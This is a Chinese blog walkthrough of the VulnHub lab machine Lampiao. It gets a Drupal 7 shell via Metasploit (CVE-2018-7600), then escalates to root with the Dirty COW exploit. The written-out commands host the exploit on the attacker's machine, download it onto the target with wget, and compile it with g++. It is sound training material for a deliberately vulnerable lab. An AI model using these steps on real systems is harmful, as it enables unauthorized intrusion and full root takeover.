【脏牛漏洞】vulnhub-Lampiao

最新推荐文章于 2023-12-29 14:41:43 发布
最新推荐文章于 2023-12-29 14:41:43 发布
阅读量398 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_atopos/article/details/125143343
版权

靶场

https://www.vulnhub.com/entry/lampiao-1,249/

打开虚拟机后,显示需要登录
在这里插入图片描述

使用nmap扫描,靶场搭建在内网环境
扫描

扫描结果
扫描结果
再扫描开放端口
扫描端口
访问端口1898
1898端口

查看web指纹,发现CMS是Drupal 7
web指纹

drupal 7 漏洞getshell

搜索有关drupal 7 的漏洞,发现CVE-2018-7600可以实现远程代码执行

注册

  1. 用户填写表单->表单没有问题->返回注册成功页面
  2. 用户填写表单->表单内容有问题(例如用户名已被注册)->调用buildform方法,把用户传入的内容一同构造为表单数组->渲染表单数组为html页面返回

该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据

想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置

使用msf进行漏洞利用

漏洞利用
设置
设置

执行
执行

获取shell
在这里插入图片描述
查看版本信息,时间2016.10.18,可能存在脏牛漏洞
版本信息

脏牛漏洞

kali搜索cow
cow

将脚本拷贝到root,方便一会获取

 cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/

在这里插入图片描述

使用python传输exp

python -m SimpleHTTPServer 8888

在这里插入图片描述

靶机获取文件

wget http://192.168.16.150:8888/40847.cpp

在这里插入图片描述

可以看到接收到的脚本文件
在这里插入图片描述
编译利用

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil 
#-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告 
#-pedantic 允许发出ANSI/ISO C标准所列出的所有警告 
#-O2 编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高 
#-std=c++11 按C++2011标准来编译的 
#-pthread 在Linux中要用到多线程时,需要链接pthread库 
#-o 40847 gcc生成的目标文件,名字为40847

在这里插入图片描述

使用,得到root修改后的密码
在这里插入图片描述
ssh远程登录
ssh远程登录
查看flag
flag

参考

Lampiao靶机渗透测试

vulnhub–lampiao(脏牛提权)

ky0uma
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
新版Linux内核提权漏洞CVE-2022-0847
03-09
5.8 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
网络安全渗透测试是评估系统安全性的过程,通常由安全专家或白帽黑客进行,目的是发现并修复潜在漏洞。在这个领域,两个知名的在线平台是Hackthebox和Vulnhub,它们提供虚拟环境供用户实践和提升渗透测试技能。这份...
vulnhub--lampiao(提权)
鲨鱼辣椒的博客
08-03 4464
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
VulnHub靶场之Lampiao
A_dmin的博客
10-16 1464
VulnHub靶场之Lampiao 最近事情有点多,但是还是要抽出点时间来学习的!!! 老样子,Lampiao虚拟机先启动,然后再启动kali!! Lampiao虚拟机启动如下,不知账户密码,估摸着和上次那个靶机是差不多的!!!..
Linux(CVE-2016-5195)提权保姆级教程
weixin_68408599的博客
08-17 2959
对CVE-2016-5159提权的保姆级的教程
[VulnHub靶机]Lampiao_提权
qq_45927819的博客
03-16 3456
环境介绍 攻击机:kali(192.168.56.104) 受害机:lampiao(192.168.56.107) 实验步骤 1. 扫描端口 nmap -sS -Pn -A -p- -n 192.168.56.107 开放了22、80、1898端口 2. 信息收集 80端口没什么东西,我们访问1898端口,还是先扫描一下1898端口下的目录: 这些文件等会再看,1898端口: 经过测试并不能注册用户,需要通过邮箱验证码才能设置密码,所以行不通. 查看博客的详情页面: 下图是第一篇: 第二篇:
【vulnhub】Lampiao渗透实战(提权)
qq_45300786的博客
04-18 809
总结 1、该靶机的WEB系统的建站CMS是drupal 7,时刻关注一些cms漏洞 2、在没有思路的时候,try yourself !往往有不同的收获 3、再练练提权。。。 Lampiao靶机百度云下载 链接:https://pan.baidu.com/s/1_TDcubSNj7z5JweaTxjgKQ 提取码:g3fn 靶机:192.168.100.129 kali:192.168.100.23 其他的我就不说了。详细过程请看Lampiao渗透实战 这里我就说一下,需要特别注意的地方。 这里我是把没有
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
在网络安全领域,VulnHub 是一个深受爱好者和专业人员欢迎的平台,它提供了一系列虚拟机(VM)镜像,用于模拟真实的网络环境,帮助用户提升漏洞利用和渗透测试的技能。本篇文章将深入探讨名为 "Alienum" 的 VulnHub ...
DirtyCow-EXP:编译好的漏洞(CVE-2016-5195)EXP
05-16
漏洞(Dirty Cow)是Linux操作系统中的一个严重安全漏洞,其正式编号为CVE-2016-5195。这个漏洞源于Linux内核中的一个竞态条件错误,允许本地权限提升,即普通用户可以获取到root权限。漏洞的名字来源于...
android系统dirty cow()漏洞的检查资料
03-22
漏洞,全称为"Dirty COW",是Android系统中的一个重大安全漏洞,首次公开于2016年。这个漏洞源于Linux内核中的一个内存管理错误,具体是由于在处理内存拷贝(copy-on-write)操作时的权限控制不当,导致普通用户...
Vulnhub-Lampiao 靶机练习
GloryGod的博客
08-11 84
记录自己的一次靶场尝试,有误地方还请各位大佬指正!
VulnHub-Lampiao-Walkthrough渗透学习
qq_34801745的博客
12-27 2319
VulnHub-Lampiao-Walkthrough 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:简单 靶机发布日期:2018年7月28日 靶机描述:Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...
靶场练习第六天~vulnhub靶场之Lampiao
qq_57976347的博客
01-31 837
一、信息收集 1.靶机发现 (1)靶机lampiao与kali均为NAT模式 ,Kali的 IP为192.168.101.10, 扫描网段用命令nmap -sp192.168.101.0/24,发现靶机ip为192.168.101.107 2.靶机具体信息 (1)使用命令nmap -A (进行综合扫描) 192.168.101.107 -p 0-65535 (看看靶机开放了什么端口)正在上传…重新上传取消 3.发现1898端口开放http协议, (1)查看该网站,发现是一个博客网站 (
vulnhub靶场·Lampiao 详细教程
最新发布
qq_72300128的博客
12-29 1437
已知该系统的版本:Drupal 7.54,浏览器搜索Drupal 7.54 exploit,且search Drupal,选择2018的那个模块,然后设置相应参数,set rhosts 192.168.183.131, set rport 1898.然后直接run。cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/桌面。设置参数(设置靶机的端口1898和靶机的ip )对1898端口的目录以及子目录进行爆破。
【渗透测试】VulnHub-Lampiao
m0_52923241的博客
10-26 314
VulnHub-Lampiao渗透VulnHub-Lampiao详细解题步骤知识点总结Linux中查看进程状态信息命令:psCVE-2018-7600——Drupaldirtycow提权Python SimpleHTTPServer:linux远程下载文件到本地scpftpwgetGCC编译常用工具篇Dirb:Kali Linux下web网站目录爆破工具cewl:密码攻击工具wget:Linux下载文件的工具 VulnHub-Lampiao详细解题步骤 VulnHub-Lampiao详细解题步骤 nma
Kali Vulnhub-lampiao提权(dirtyCow)漏洞复现
牛奶栗的小博客
09-27 4264
​vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249。 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式...
vulnhub靶场之lampiao
向阳-Y.的博客
02-28 4263
目录1.信息收集2.尝试爆破ssh登录【失败】3.尝试访问网站3.1扫描目录【失败】4.网站系统漏洞【get】5.提权阶段 1.信息收集 首先查看本机网卡网段并来一波存活主机探查,经过排除,锁定了192.168.86.132为靶机 nmap -sP 192.168.86.0/24 接着再对靶机进行一波端口扫描,扫描后的结果如下 nmap -sN -sV -p 1-65535 192.168.86.132 2.尝试爆破ssh登录【失败】 首先使用msfconsole进行ssh登录爆破一波 msfcon
vulnhub之lampiao实战攻略
weixin_43862283的博客
04-14 597
** vulnhub之lampiao实战攻略 ** 0x01 环境及配置 难度 : easy 下载地址 : https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM 0x02 正题:攻击开始 第一步,使用nmap对内网进行扫描,获取靶机IP地址(192.168.34.153) 在获取IP地址后,使用nmap对该I...
No.2-VulnHub-Lampiao渗透学习
meng_mo_jue_ying的博客
03-21 4139
VulnHub-Lampiao渗透学习 一、前言 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 难度:简单 目标:获取root权限,并获取到flag 二、信息收集 1.获取攻击目标 使用nmap或者netdiscover扫描网段信息,获取攻击目标 # nmap扫描网段 nmap -sP 192.168.88.0/24 # netdiscover扫描网段 netdiscover -r 192.168.88.0/24 扫描到攻击目标:192.168.88
漏洞CVE-2016-5195的影响范围?
06-09
漏洞(CVE-2016-5195)是一个 Linux 内核本地提权漏洞,影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。该漏洞可以被攻击者利用来提升其权限,从而获得对系统的完全控制。因此,该漏洞的影响范围非常广泛...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值